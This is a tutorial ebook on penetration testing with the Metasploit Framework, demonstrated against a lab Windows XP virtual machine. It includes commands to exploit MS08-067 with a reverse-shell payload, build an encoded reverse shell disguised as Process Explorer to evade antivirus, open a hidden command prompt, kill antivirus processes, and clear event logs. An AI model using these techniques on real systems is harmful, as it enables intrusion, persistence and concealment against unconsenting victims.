Metasploit Framework by Achilli3st
Mar 02, 2016
A good way to start off with metasploit.
Contact: [email protected]
-
THE METASPLOIT FRAMEWORK
By Savan Patel(AKA X/Achilli3st)
-
CONTENTS
Basics of Penetration Testing
Setting up the Box
Introduction to metasploit
Information Gathering
Vulnerability Assessment
Exploitation
Evading Firewall and Antivirus
Post Exploitation
-
Chapter 1
Basics of Penetration Testing
Vulnerability:
In terms of cyber security a system vulnerability is a weakness or a
flaw either in the system hardware or the software, which can be
taken advantage(exploit) to gain access of the system.
Illustration:
Vivek owns a USB modem to access the internet. The modem has
a limited plan of 1GB 3G data. One day while working on a project
for hours together Vivek realizes that he had exceeded his limit of
1GB data but was still able to use the Internet.
The modem updates itself about the usage of data each time it
connects to the server. Hence even if Vivek had exceeded the limit
of 1GB was still able to use internet because there was no update
modem received about exceeding the limit. It was only when Vivek
disconnects the modem and connects it again, he understand the
update mechanism of the modem.
Now since Vivek knows about the update mechanism flaw, he uses
the modem to his full advantage.
This flaw of update mechanism is a VULNERABILTY of the USB
Modem.
-
Exploit:
In terms of cyber security, taking advantage of a known
flaw(vulnerability) in system hardware or the software in order to
compromise the system security and gain access or harm the
system is known as Exploitation, and the piece of code that does
the above is known as an EXPLOIT.
Illustration:
According to Greek Mythology, Achilles was a Greek warrior and
a hero of the Trojan war, a war fought between Troy and the
Greeks.
Achilles was known to be The Invincible because he was a son of
a god. His mother tried him to make invincible by dipping him in
the river, but he was left vulnerable at the heel from where his
mother was holding him while dipping him in the river.
At almost end of the Trojan war, Paris The Prince of Troy gets to
know this vulnerability(heel). Paris shoots a poisonous arrow at
Achilles' heel and Achilles dies.
So in the context of Computer Science the Achilles' heel was
vulnerable, which Paris took advantage of. The act of Paris
shooting the arrow at Achilles heel is EXPLOITATION, and the
poisonous arrow is an EXPLOIT.
-
PAYLOAD:
In terms of cyber security, payloads are the programs that are
executed on the victim machine after exploitation. This may
include compromising the systems security and gaining complete
privileges or deploying malicious software etc.,
Note:
Payload has its own different meanings in context with metasploit
and with networking.
Listener:
Listener is a component that needs to be setup on the attacker
machine in cases where the victim machine would try to make a
connection to the attacker, so the listener would take care and
handle the incoming connection. We come across such scenarios
when the security level of the victim machines are high and an
attacker would require inside-out connection for exploitation.
Social Engineering:
Social Engineering is an act of manipulating people for the purpose
of information gathering, gaining access to systems or even frauds.
-
What is Penetration Testing?
Penetration Testing (often called Pentest) is the process of testing the
security level of a single machine or a complete network by simulating
attacks on these machine and providing proper solutions to overcome these
security flaws.
The evaluation of security on these machines reveal the flaws that exist in
the hardware or the software and misconfigurations a network suffers from.
And to what extent these flaws can be taken advantage of, to breach the
security and gain access into these machines and networks.
The metasploit framework is one of the major part of the Penetration
Testing Process. This framework allows the pen tester to evaluate until
what extent the flaws on a machine can cause harm and grant privileges to
the attacker.
Penetration Testing Process is carried out in a well defined manner. This
process has different phases where each phase has its own necessity and
importance.
Phases of Penetration Testing Process:
1. Information Gathering
2. Scanning
3. Vulnerability Assessment
4. Exploitation
5. Post Exploitation
6. Reporting
-
The Need of Penetration Testing:
If the companies do not find what is vulnerable in their networks or
machines and patch them before an attacker gets hands on it, then that
might land them into big trouble.
Cyber crimes have been on a all time high in the last decade. Things like
web defacement, stealing of private information etc., could damage any
organizations reputation. Hence no organization would like to risk against
such attacks.
-
Phases of Penetration Testing:
Phase 1:Information Gathering
Information gathering, also known as Reconnaissance is a initial phase of
penetration testing where the Pen Tester start gathering information of the
target network or a machine.
Information gathering is basically of two types, active and passive.
Passive information gathering involves collecting information about the
target network or the machine without directly interacting with them.
For example searching whois records and other information available
online.
Active information gathering involves collecting information about the
victim by directly interacting with the machine. Active information
gathering may reveal a lot of information about the victim for example, the
emails, phone numbers etc.,
Phase 2 : Scanning
Scanning is the pre phase attack where the pen tester starts scanning the
networks.
Scanning is generally of three types
Network Scanning:
Network scanning includes scanning of the whole network to find which
system on the network are working or alive currently and which are not.
Network scanning reveals the IP addresses of the computers which are
currently up and can be scanned.
Example Angry IP scanner:
-
Port Scanning:
After successfully Network scanning is completed, network scanning
reveals the list of IP addresses are up and running, the pen tester then starts
scanning the ports on each machine. The scanned ports reveal the
applications that are running on the systems. Port scanning reveals the
Operating systems running on each of the machines in the network.
Vulnerability Scanning:
Vulnerability scanning is a part of the vulnerability assessment phase.
Phase 4 : Vulnerability Assessment
In vulnerability assessment phase all the machine are scanned for
vulnerabilities present on each of the machines. This process is carried out
by various vulnerability scanners available in the market.
This is an automated process. All the tools that are used for vulnerability
assessment may not give 100% precise results. These scanners tend to
generate false positives.
Phase 5 : Exploitation(Gaining Access)
This phase of the penetration testing is carried out by various techniques.
These various techniques involve Remote Administration Tools, Social
Engineering and The metasploit Framework.
Phase 6 : Post Exploitation
After gaining access into the machines, the next thing is to maintain access.
This is done by planting backdoors or by root kits which would give pen
tester all the access anytime they need it again.
-
Phase 7: Reporting
This is the most important phase as a penetration tester, where a
Documentation about the complete process that has been carried out is
made. It majorly specifies the vulnerabilities that were present on the
network that need to be patched. And most importantly it contains the
solutions provided by the pen tester to secure the network and the
individual machines.
-
CHAPTER 2
Setting up the Box
Penetration Testing requires tools like Metasploit, Nessus and Nmap. These
tools are available for premium downloads if one wishes to buy them or the
free versions of these tools are always available.
Tools required:
1. Metasploit
2. Nessus
3. Nmap
Windows Setup:
If you are a windows user and if you wish to stick to windows for the
penetration testing then Metasploit for Windows can be downloaded from
the official Rapid7 website.
http://www.rapid7.com/products/metasploit/download.jsp
For Vulnerability Scanning you can use Nexpose or Acunetix. Both are
windows based vulnerability scanners. Nexpose is again a development of
Rapid 7, and can be downloaded for their official website.
http://www.rapid7.com/products/nexpose/
Acunetix is another windows based vulnerability scanner. It is known for it
very user friendly GUI. This can be downloaded from its official website,
which gives a trial version for free.
http://www.acunetix.com/vulnerability-scanner/download/
-
And the last tool we would need is the nmap scanner. Nmap stand for
Network Mapper, it is one of the most oldest yet powerful command line
tool used for network scanning. Nmap is basically a Linux based tool but
was made available for the windows users also after 2000.
http://nmap.org/book/inst-windows.html
-
Linux Setup:
All the tools required for penetration testing come built-in in one of the
flavours of Linux i.e., Back Track.
For the demonstrations in this book I have used the Linux Back Track 5
Revision 3, the last of the Back Track. This Operating system is specifically
made for penetration testing and security research. This includes each and
every little tool a penetration tester would need for testing.
The makers of Back Track have released another such flavour based on
Linux called Kali Linux. It is also made for Penetration testers and can be
used by anybody. These Operating systems are available freely on the
internet.
-
My Setup:
For the purpose of demonstrations in this book, I have installed both the
victim as well as the attacker on the Virtual Machine. I have used VMware
Workstation 9 for virtualization.
Figure 1 : VMware Workstation 9
The Operating Systems:
You can download Back Track from its official web site:
Backtrack 5 Revision 3: Attacker Machine
Figure 2 : Backtrack 5 Revision 3(Attacker)
http://www.backtrack-linux.org/downloads/
-
Windows XP Service Pack 2: Victim Machine
Figure 3 : Windows XP SP2(Victim)
-
Chapter 3
Introduction to Metasploit
What is The Metasploit Framework?
The Metasploit framework is an open source and a part of The Metasploit
Project by Rapid 7 which allows the security experts to evaluate the
security of a machine or a network and conduct penetration testing on these.
The Metasploit Framework is a cross platform Framework developed by
H D Moore in 2003 and later acquired by Rapid 7.
The Metasploit is not a specific application, it is a complete framework
which allows the security experts to not only evaluate the security of a
machine or a network but, since it is an open source project it gives the
power to build their own programs which can be added to their framework
and use them as they wish.
For example consider Metasploit framework as a set of building blocks,
which can be customized according to the pen testers requirement and then
use this framework accordingly. Due to this flexibility Metasploit has
emerged as one of the most widely used Exploit Development Framework.
Figure 4 : The MSF Console
-
History of Metasploit:
The complete project of Metasploit (which includes metasploit framework,
Opcode Database, shell code archive and security research) was developed
by H Moore in 2003. Later Spoonm(handle) and Matt Miller joined the
project.
The vision behind the development of metasploit was to bring all the
exploits, payloads and post exploitation scripts under one platform to ease
the life of a Penetration Tester. Before metasploit came into picture exploits
and the payloads were individual executables which had to be downloaded,
compiled and then executed.
Initially it was programmed in Perl, but later due to many disadvantages it
was rewritten in Ruby. Ruby was choosen due to several reasons and one of
the major reasons was the ease of writing code, given it was Object
Oriented. Later in the year 2009 The Metasploit Project was acquired by
Rapid7 which deals with vulnerability management and penetration testing.
Rapid7 is led by H Moore and Mike Tuchen in Massachusetts.
-
Features:
Runs on Windows, Linux, MAC OS, Nokia N900, Android, Jail
Broken Apple I phones.
It has a GUI called as Armitage and console based GUI which makes
it very easy for the users to use Metasploit.
There are more than 1000 different exploits for windows, Linux/Unix
and MAC OS and hundreds of payloads.
It also provides encoding of the payloads that helps the attackers from
not getting detected by the Anti-Virus programs.
It lets the attacker gain different level of access on the vulnerable
remote machine.
It helps evaluate to what level a machine is secured.
It not only allows pen testers for penetration testing but the metasploit
framework has been built keeping in mind the security researchers
also.
Everything in the framework is accessible and alterable.
An exploit developer can built their own exploits and integrate them
into the metasploit framework for their own usage.
Since metasploit framework is an open source it helps the researchers
to go through the codes of the exploit and the payloads to which they
can customize.
Metasploit also supports databases which would help the Penetration
Testers to keep a track of all the penetration testing results.
-
Architecture of Metasploit Framework:
The architecture of metasploit has been designed in such a manner that the
relation between each module of metasploit is as least as possible so as to
encourage code re-usage for other major projects. The metasploit
framework is an open source, so the code of any exploit or any payload is
readily available in case a programmer wants to re-use the code for further
enhancement.
The architecture of metasploit consists of three major parts
Libraries
Interfaces
Modules
Figure 5 : Architecture of Metasploit Framework
-
Figure 6 : Architecture of Metasploit Framework 2
Libraries:
REX:
REX stands for Ruby EXploitation library. It is considered to be the most
basic library for most of the functions.REX deals with sockets, protocols
and shell interfaces. It is designed in such a way that it does not depend on
anything other than the default install. The REX library contains various set
of classes and modules which are applicable for further extensions to
projects. Some of the important classes are
-
Assembly Helps in generating assembly codes on a fly, since they
are very important for writing exploits.
Encoding The rex library allows the users to encode the buffers
using different XOR algorithms. These encoders are used in the
encode module.
Exploitation At times some of the vulnerabilities need to be
exploited in a similar manner i.e., the way they are attacked are
similar. To avail flexibility REX provides the exploitation classes
which serve similar purposes.
Sockets Sockets is one of the most important set of classes in REX
library. It provides important classes to establish connections on the
remote machine.
MSF Core:
MSF core contains a set of classes that provide an interface to the modules
and plugins. It is contains both auxiliaries and exploits.
Exploits relating to HTTP, FTP, Oracle, SQL, SMB
Auxiliaries relating to Scanner, Fuzzers, Report, dos etc. The auxiliary
module of MSF core makes use of the REX libraries.
MSF Base:
While the MSF core implements some of the abstract sessions, MSF Base
implements some of the concrete implementations. Two of the major
sessions implemented in the MSF Base are Command shell and
Meterpreter.
-
Interfaces:
Msfcli:
Msfcli is a command line interface for metasploit. Msfcli is good when
testing and developing new exploits and also good for learning the
framework. But it has a major drawback that it can handle only one shell at
a time making it difficult for the client side attacks. It also doesnt support
any of the advanced automation features. It is a great tool for a tester who
knows exactly what inputs has to be given to the console. Msfcli has a
major advantage of directing output to other tools and also taking inputs
from some other tools.
The Msfcli is used directly for the shell terminal itself.
Figure 7 MSFcli
-
MSF Console:
MSFConsole is the most popular interface for metasploit. It allows access
to possibly all the options available in metasploit. Once the user gets hands
on msf console they would appreciate the ease of use of msfconsole. It is
infact the most easy way to access and use The Metasploit Framework.
Although Metasploit Framework has been going under constant changes
since it was released, the basic metasploit usage commands remains the
same.
Figure 8 MSF Console
Figure 9 Starting MSF Console
-
Armitage(GUI):
Armitage is a front-end GUI for metasploit framework which was
developed by Raphael Mudge. It helps visualizing the targets and exposes
the complete features of Metasploit. It is made for the security practitioners
who do not use metasploit on the daily basis.
Figure 10 Armitage GUI
-
Modules of Metasploit Framework:
Figure 11 MSF Console Screen
Exploits:
Exploits are programs that help the intruder to take an advantage of the
vulnerability that are present on the victim system.
Auxiliary:
Auxiliary modules are the exploits without payloads, which do not get you
a control over the victim system but performs functions like scanning,
sniffing, fingerprinting and automating tasks.
Posts:
Post is the collection of scripts and programs that an intruder can use on the
victim system to perform various actions after he/she has gained access of
the system. Those actions may include editing registries, setting up
backdoors and further gaining access to internal network.
-
Payloads:
Payloads are the programs that the attacker sends to the victim after
exploiting the vulnerability, and the program is executed on the victims
machine. It gives the attacker control over the victim machine. Running a
shell is the most common payload. The type of payload the attacker might
choose depends on certain constraints, one of them is the memory buffer
available on the victim system for the payload to execute.
Payloads are on the whole divided into three types
Singles: Singles are completely standalone and simple codes that
might be as simple as creating another user on the victim machine or
running a small application.
Stagers: Stagers are generally used to create a network between the
attacker and the victim. It allows the attacker to initially use a small
payload to load larger payloads on the target machine. So stager is
basically taking care of the restrictions that occur in single payloads.
Stages: The various payload stages allow the attacker to have
advanced control over the victim. An example of stages is
Meterpreter.
Encoders and NOPS:
The payload and the exploits that the attacker sends to the victim machine
may get detected by various security tools like antiviruses, IDS/IPS and
firewalls. So to prevent these payloads and exploits from getting detected
Encoders and NOPs (No OPeration generators)are used which encodes the
payloads and the exploits when they are transmitted over the wire.
-
Working :
The attacker attacks the victim machine using an exploit for a
particular vulnerability.
The exploit carries with it a small payload with it.
The payload connects back to the Metasploit Framework which lets
the attacker overcome various kinds of restrictions that may occur for
executing larger payloads on the remote machine.
And at last there is a client-server connection between the attacker
and the victim.
Figure 12 Execution of Exploit and Payload
-
MSFupdate
MSFupdate is one of the metasploit utilities which allows a user to update
the Metasploit Framework. Whenever the Rapid7 reveals an update for the
Metasploit Framework, it can be directly downloaded from our machine
using the MSFupdate utility.
root@bt:~# msfupdate
Figure 13 MSF Update
-
The Backend
If a pen testers is running penetration testing on a huge network
then keeping a track of everything going around becomes difficult
for a pen tester. Hence metasploit comes with an extensive support
of databases, which can store the things carried out on the
metasploit framework and also import and export data from various
other tools.
The metasploit framework supports PostgreSQL which is the
default database.
Setting up a database:
-> Navigate to
Figure 14 Default Database Credential File
-> Open database.yml to see the default settings of the database.
The default User names and the passwords are created, note down
these credentials as they will be required further.
Figure 15 The Database Credentials
-
-> To connect database to the metasploit framework execute the
following command
msf > db_connect username:password@host_ip:port/database name
Figure 16 Connecting Database
-> To check the status of the database execute db_status.
Figure 17 Database Connection Status
-> To disconnect the database
msf > db_disconnect username:password@host_ip:port/database name
Figure 18 Disconnecting Database
-
-> Other database commands
Figure 19 Database Commands
-
Chapter 4
Information Gathering
Information gathering is the initial stage of penetration testing(also known
as Reconnaissance) where the pen tester starts gathering information about
the target network or a single machine. The main aim of this phase is to
gather precise information about the victim. This information may include
various things like how the organization operates, what may be best way to
enter into the organizations computer, who would fall a prey of social
engineering etc., Information gathering has to be performed thoroughly in
order to make sure a tester does not miss any vulnerable targets that can be
exploited. It takes time and patience to perform information gathering, to
know the complete infrastructure of the target. At this stage a pen tester
tries to collect as much as information available and makes sure each and
every little thing is recorded.
Information gathering is the most important aspect of any penetration
testing since it provides the foundation for any work that has to be carried
out.
Information gathering is divided into two types, one is passive information
gathering and the second is active information gathering.
Passive information gathering is the technique to gather information
about the victim target without getting into physical contact with the victim
machines.
The tools or rather services that can be used to gather victim information
include whois search, netcraft etc.
Let us take a look a few tools and techniques that can fetch us information
about the target.
-
Whois Search
Whois is basically a huge database that store information about the
registered resources on the internet. When a new domain name is bought on
the internet, information like the name of the company, the website is
registered to, name of the registrar, contact details etc., are stored in this
database.
Example:root@bt:~# whois asianlaws.org
root@bt:~# whois website_name.com
Figure 20 Whois Query
-
This reveals several important things about an organization which may turn
out to be pretty important for a pen tester. There are plenty of websites that
provide this service, like who.is, whois.com, whois.com etc.,
Netcraft
-> Netcraft is an online service which provides web server, operating
system, domain name server detection etc.,
Figure 21 Netcraft Service
NS Lookup:
NS Lookup is a command line tool available in various operating systems
which is used for querying IP address, domain name system and various
other things. It is present in Windows as well as many Linux flavours.
Figure 22 NS Lookup
-
Google Dorks:
Google dorks is a way to dig information about the websites, web servers
etc., This information is revealed due to inappropriate configuration of the
servers and the websites.
This is an example of a google dork which reveals the admin login page of
the website.
Figure 23 Google Dorks
-
Active Information Gathering
In active information gathering the information about the target is fetched
by directing getting into the contact with the target machine or network.
The results of the Active information gathering is generally the conclusion
of various queries that are put to the network or the machines.
Nmap is one of the most powerful tools developed until date for active
information gathering.
General nmap scanning:
Figure 24 Basic Nmap Scan
To use nmap in Backtrack we use the nmap command from the
terminal followed by the options and the IP address.
Options:
-sS -- Stealth Scan
-sV -- Remote Services Version Detection
-O -- Operating System Detection
-
Using the Metasploit Back end to store results:
In a complex penetration testing scenario where a whole network
or a very large number of computers are being tested then it
becomes difficult for the pen testers to keep a track of all the
computers.
This issue of the pen testers is addressed in metasploit where the
scan results of nmap can be imported into the framework database.
This is also an advantage when a group of pen testers are working
together on a large network.
To import the scan data into the framework database, the results of
the nmap has to be stored in a file, which can be later imported into
the framework using the db_import option of the framework
database.
Figure 25 Subnet Scan
In the above scan we store the results in a file name nmap.
Writing to a file is done by using the -oX option of the nmap
scanner.
-
Figure 26 Connecting the Database
Connect the database to the Metasploit Framework using the
db_connect command and then import the nmap results that we
have stored in a file name nmap. To import the data in the
framework we use db_import command.
Figure 27 Importing Nmap Results
After importing the file, we can apply queries to the imported data
and use them for further testing.
Figure 28 Nmap Results in Metasploit Framework
Running Nmap from Metasploit:
Apart from running nmap and importing results into metasploit,
metasploit also comes with the ability to run nmap directly from
the metasploit framework.
-
To run nmap from the metasploit framework we the following
command
msf > db_nmap -options x.x.x.x
Figure 29 Nmap from Metasploit
-
Scanning with Metasploit:
Even though nmap is a very powerful tool, metasploit framework
itself comes with all these inbuilt capabilities that it does not need
nmap or any such scanning tool.
The modules that conducts this scanning is called auxiliary
module. This module provides pen testers with all major types of
scans that the pen testers need.
The scanning in auxiliary module is carried out in 3 phases.
->Setting up the type of scan required using the use function.
Figure 30 Auxiliary Scan
-> Setting the parameters of the scan.
To set the parameters, first check the parameters required for
running the script. Set the parameters using the set command.
-
-> Run the auxiliary scan using the run command.
Figure 31 Auxiliary Scan Result
The auxiliary module of the metasploit provides with extensive
range of scanning programs.
Figure 32 Auxiliary Scanning Module
Few of these programs can help detect the kind of services they are
running, and there are other programs that help evaluating the
number of ports open on the machine.
-
Chapter 5
Vulnerability Assessment
Vulnerability assessment is an automated program which looks for
weaknesses in the remote computers or networks. The vulnerability
scanners comes to conclusion about the vulnerability based on the
response it receives to the packets sent to it.
Scanning with Nessus:
Installing Nessus:
-> Nessus comes pre installed in the operating system that we are currently
using for penetration testing(i.e. Backtrack 5 R3).
-> But before we start using Nessus directly we need to enable it.
-> To enable Nessus we need to register on the tenable.com as a user.
-> And to use free Nessus we need to register for the home feed.
http://www.tenable.com/products/nessus/nessus-homefeed
-> After registering we would receive a mail with the activation code on our
email.
Figure 33 Nessus Registration
-
-> After we receive the activation code, activate nessus on the Backtrack
OS from the terminal using the following command.
root@bt:~# /opt/nessus/bin/nessus-fetch --register x-x-x-x-x
Figure 34 Activating Nessus
-> After that is completed, register a user.
Figure 35 User Add
-
Register a user in the user add function of nessus, this registered user will
be used to log into the Nessus and use it.
Figure 36 Registering User
After successfully registering a user, to use nessus start the nessus
server using start nessus option in dropdown list.
Figure 37 Start Nessus
-
Running Nessus:
Nessus vulnerability scanner is accessed from a browser, after
nessus server is initialized open a web browser and browse to
https://localhost:8834, this would open the nessus login screen as
shown.
Figure 38 Accessing Nessus
Figure 39 Nessus Login Screen
-
-> Login with the name of the user that we created.
Figure 40 Nessus Interface
Scanning with Nessus:
To start scanning with nessus go to scans option and click add
scan. Give the scan options and launch the scan.
Figure 41 Initializing Scanning
-
The scanning of vulnerabilities would take a little bit time. And
after the scanning has been completed, the report can be viewed
from the reports column.
Figure 42 Scanning Reports
Browse through the list of vulnerabilities from the report. The
vulnerabilities are well sorted with the amount of risk they pertain.
Figure 43 List of Vulnerabilities
Figure 44 List of High Risk Vulnerabilities
-
Importing Nessus result to The Framework Database:
-> To import the Nessus report into the metasploit database.
-> Download the Report from Nessus in .nessus format.
-> In the msf console is connected import the file using db_import
Figure 45 Connect to database
msf > db_import report.nessus
Download the Nessus vulnerability report and then import it to the
metasploit framework database using the db_import command.
Figure 46 Importing Nessus Report
Pen testers can put general queries to the vulnerability database to fetch the
information.
Figure 47 Querying Nessus Results
-
Chapter 6
Exploitation
The metasploit framework comes with more than 1000 exploits
now, and the number of exploits have been increasing from time to
time. Different exploits have different capabilities and these
exploits vary from windows to ubuntu as well as android exploits.
Let us quickly proceed towards exploitation.
Exploitation is carried out in four steps
-> Setting the exploit
-> Setting the Payload
-> Setting the options
-> Exploit
-
Basic Commands:
---> search
The search command is used to search any specific exploit, any
specific payload or any other module as well.
Figure 48 Search Command
---> use
The use command is used to set the exploit.
Figure 49 Use Command
--->show
The show command is used to see the list of exploits, payloads and
also options that are to be set for successful exploitation.
Figure 50 Show Command
-
---> set
The set command is used to set things like payload and various
options that need to be configured for exploitation.
Figure 51 Set Command
Based on the vulnerabilities found on the victim machine, one
strong vulnerability is chosen exploiting which could give us
maximum privileges. In the current scenario we would choose
MS08-067 which was one of the vulnerabilities we found in
vulnerability assessment. This is a netapi vulnerability which
allows the attacker to execute code remotely using Remote
Procedure Call.
Victim Machine:
-> Windows XP Service Pack 2
Figure 52 Victim Machine
-
STEP 1:
-> Using the search command we can find the exploit for this
vulnerability.
Figure 53 Searching Exploit
-> After we have found the exploit which we were looking for, the
next step is to set the exploit for use.
-> To do so we use the use command
Msf > use name-of-exploit
Figure 54 Setting Exploit
STEP 2:
-> After we have set the exploit, the next thing to do is to look for
an appropriate payload for the exploit.
-> In the previous definitions we have seen that a payload is
something that is going to execute on a remote machine after the
remote machine has been exploited.
-
-> So in this let us choose a payload that fetches us a command
prompt of the remote machine.
msf exploit(ms08_067_netapi) > search windows/shell
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
Figure 55 Searching Payload
-
STEP 3:
-> After the exploit and the payload has been set, the next thing to
do is to set the options that are required to execute the exploit
successfully.
-> To see the options that are required to be set, use the command
show options.
Figure 56 Show Options
-
RHOST : Remote machine IP Address
RPORT : Remote machine Port Number
LHOST : Local Host IP Address
LPORT : Local Port Number
-> For this attack we require two things to be configured the
LHOST and the RHOST, the rest of the things like LPORT,
RPORT etc., that are needed for the attack are preconfigured.
-> To set the LHOST and the RHOST we use the set command
msf exploit(ms08_067_netapi) > set LHOST x.x.x.x
msf exploit(ms08_067_netapi) > set RHOST x.x.x.x
Figure 57 Set Options
Note: We have not selected any specific exploit target, and is set to
automatic targeting.
-
STEP 4:
-> The last and the final step of the process is to exploit.
-> This is done using the exploit command.
Figure 58 Exploit Command
We have successfully broken into the victim machine, and we are
having a command prompt using which we can explore deep into
it.
If we take a look at the victim machine everything seems to be
normal., there is no clue of anything wrong at all.
Figure 59 No Suspicion
-
But in case the victim is smart enough to take a look at the
processes running on his machine he would find a background
command prompt on his machine which would create suspicion.
Figure 60 Victim Task Manager
This means that there is a complete new process created on the
victim machine. What can be done to avoid such detection? We
would take a look at it in the upcoming chapters.
-
Chapter 7
Evading Firewall and Anti Viruses
In the last chapter we have seen how to exploit a victim machine
and take the control over it.
In this chapter we would take a close look at the on how to evade a
firewall first and the anti viruses.
PART 1:EVADING FIREWALL
In the above exploitation we had no firewall running on the victim
machine and hence everything went smooth and easy, but in
today's world people have become smart enough to use at least a
default windows firewall.
Now, if the firewall is up and running then there is now way that an
attacker can break into the victim machine.
A solution to evade a firewall only can be a reverse connection
from a victim to the attacker. But how is that possible??
Here comes something called CLIENT SIDE EXPLOITATION.
The client side exploit takes an advantage of vulnerabilities found
on applications the victim is running. It requires a little bit of social
engineering.
In our demonstration we will take a look at browser based client
side exploitation, because browsers are not something that is
regularly updated as the operating system.
-
We would setup an attack web server which would load a ton of
exploits based on browsers and when the victim connects to the
server, the we can get the control over the victim.
Let's start:
-We have turned the windows firewall ON.
Figure 61 Windows Firewall
-
STEP 1:
-> We will be using one of the auxiliary modules called the
browser autopwn.
-> To set the module use the following module:
Figure 62 Set Auxialiary Module
STEP 2:
-> Set options required for the above exploit.
Figure 63 Show Auxiliary Options
Figure 64 Set Auxiliary Options
-
STEP 3:
-> Run the server using the run command.
msf auxiliary(browser_autopwn) > run
This would start a server and load all the browser based exploits to
the server.
It is a little bit time consuming process so be patient and wait for
all the exploits to load.
Figure 65 Loading Modules to Server
-
STEP 4:
-> Now after you see the Server started on you terminal, convince
the victim by some means or misguide him/her to connect to the
attacker's ip address from the browser.
-> Social engineering would do best.
-> It does not show up anything to the victim as if nothing
happened but back on the attacker machine the server has executed
its own code.
Figure 66 Victims Browser
-> As soon as the victim puts the ip address in the browser the
following code is executed by the server.
Figure 67 Execution of Exploit
-
-> To use the session that has been created by the server use the
following commands.
Figure 68 Using the created Session
-> Now what we have got running is a meterpreter session. We
would take a look at it in the later chapters.
-
PART 2: KILLING WINDOWS FIREWALL
To kill the windows firewall we need a command prompt, but as
you can see we have meterpreter as a payload instead.
To get a command prompt from the meterpreter execute the
following command
Meterpreter > execute -f cmd.exe -c -H
Figure 69 Execute command of Meterpreter
-> Next we need to execute following command from the
command prompt to disable the firewall.
Figure 70 Disabling the Windows Firewall
The windows firewall immediately turns off blocking any kind of
connections.
-
PART 3: Evading Antivirus
Most payloads and the exploits that we have created until now at
some point or the other would create temporary files on the victim
machines and hence good anti viruses would eventually raise an
alarm.
To prevent this from happening we would have to take up certain
measures.
Evading antivirus is a little bit complex job and hence we will take
a look at it step by step.
We will be using three different concepts together so that there is
no chance of an antivirus detecting the connection.
We will be creating a standalone payload using MSF Payload. This
payload will be then encoded using MSF Encode module. And we
will apply a custom template so that it does not raise any suspicion.
After all this is done, we will create a listener on our machine
which will wait for the connection from the victim.
Step 1:
-> Download process explorer as we will be using process explorer
as the custom template.
-> Download it and extract it.
Figure 71 Unzipping Process Explorer
-
Step 2:
-> Execute the following command.
root@bt:/opt/metasploit/msf3#msfpayload windows/shell_reverse_tcp
LHOST=x.x.x.x LPORT 8080 R | msfencode -t exe -x
processexp/procexp.exe -o /root/Desktop/file_name.exe -e
x86/shikata_ga_nai -c 10
Figure 72 Encoding
-> This would create a file on the desktop named Process Exp.exe.
Figure 73 Process Explorer
Step 3:
-> The next step is to send the file we recently created to the
victim.
-> And simultaneously we need to set up a listener on our machine.
-> We will be setting up a listener using msfcli which would listen
for incoming connections.
-
-> Execute the following command to setup a listener.
root@bt:/opt/metasploit/msf3 # msfcli exploit/multi/handler
PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.254.132
LPORT=8080 E
Figure 74 Launching Listener
-> After executing the command wait for the victim to run the file
we sent.
Figure 75 Encoded File on Victim Machine
-
-> As soon as the victim executes the standalone payload, we get a
command prompt of the victim.
Figure 76 Execution of Exploit
Part 4: Killing Antivirus
-> To kill an antivirus we need to use the meterpreter payload. We
will take a look at the complete meterpreter in detail in the
upcoming chapters.
-> After we have successfully evaded the antivirus the next most
important thing to do is to kill the antivirus.
-> Make sure to use the meterpreter payload.
Figure 77 Searching Meterpreter
-
Figure 78 Setting Exploit and Payload
Figure 79 Exploiting
-> To take a look at all the options of meterpreter
Meterpreter > ?
This would display a huge list of options that come along with
meterpreter. Meterpreter allows the attacker to execute scripts on
the victim machine and one of those scripts is killav.rb
-
The killav.rb is a ruby script that can be executed remotely from
the attacker machine to shut down the antivirus. Though this script
does not guarantee 100% success, making a little bit of changes to
the script by ourselves would make it work perfect.
Step 1:
-> After getting the access through meterpreter, check all the list of
processes running on the system using ps command.
Meterpreter > ps
Figure 80 PS command
From the list note down all the processes that are associated with
the antivirus.
avgwdsvc.exe
avgui.exe
avgidsagent.exe
avgrsx.exe
avgcsrvx.exe
The killav.rb script searches for any antivirus processes from a list.
-
Step 2:
All we need to do is to edit the killav.rb script and add these
processes to it.
To edit the script go to the following directory.
Figure 81 Opening Killav
Figure 82 Editing Killav.rb
-> Save the script and quit.
-
Step 3:
-> Go back to meterpreter and execute the script using the run
command.
Figure 83 Running the Script
-
CHAPTER 8
POST EXPLOITATION MODULE
Meterpreter initially was just a payload, but then as time passed it
evolved into post exploitation tool. That was because of its wide
range of functionalities. Single payloads could perform only
specific tasks for example adding of a new user or give a command
shell to the attacker etc., but when it comes to meterpreter, it
creates a platform for the attacker on the victim machine to execute
different programs.
Apart from that the main reason for such widespread use of the
meterpreter is that it does not create a temporary file on the victim,
whereas the other payloads do. Creation of temporary file may
create suspicion and may even be detected by antivirus or host
based Intrusion Detection Systems.
Meterpreter uses an encrypted communication channel.
Meterpreter does not create a new process on the RAM either, it
gets itself executed under a system parent process.
-
Phases of Post Exploitation:
-> Understanding the victim
-> Privilege Escalation
-> Collecting Data
-> Deleting Logs
-
1. Understanding the Victim Better:
Using the help command would give us the list of command in
meterpreter.
-> System Information
Figure 84 System Information
-> User ID
Figure 85 Getuid
-> Getting the list of processes currently running
Figure 86 List of Processes Running
-
-> Idle Time
Figure 87 System Idle Time
-> Check if the system is a Virtual Machine
Figure 88 Check for a Virtual Machine
->List of Meterpreter Scripts Available
Figure 89 Meterpreter Scripts
-
-> Get Environment
Figure 90 Get Environment
-> Get Application List
Figure 91 List of Applications Running
-
-> Dumping complete system information
Figure 92 Complete System Information
-> The directory in which the data is dumped in.
Figure 93 Dump
-
Figure 94 Data dump Files
-
Privilege Escalation
Carrying out privilege escalation is very simple in meterpreter. It
has a inbuilt script called getsystem which give you the
administrative privileges if executed.
Figure 95 Get System
Clearing Logs:
-> Clearing Event logs
Figure 96 Clear Event Logs
-
Collecting Data:
-> Meterpreter comes with an option of uploading and download
files. To download files go to the directories and download using
the download script of meterpreter.
Figure 97 List of Files
Figure 98 Download Files
2014-07-10T02:26:38-0700DocuSign, Inc.Digitally verifiable PDF exported from www.docusign.com
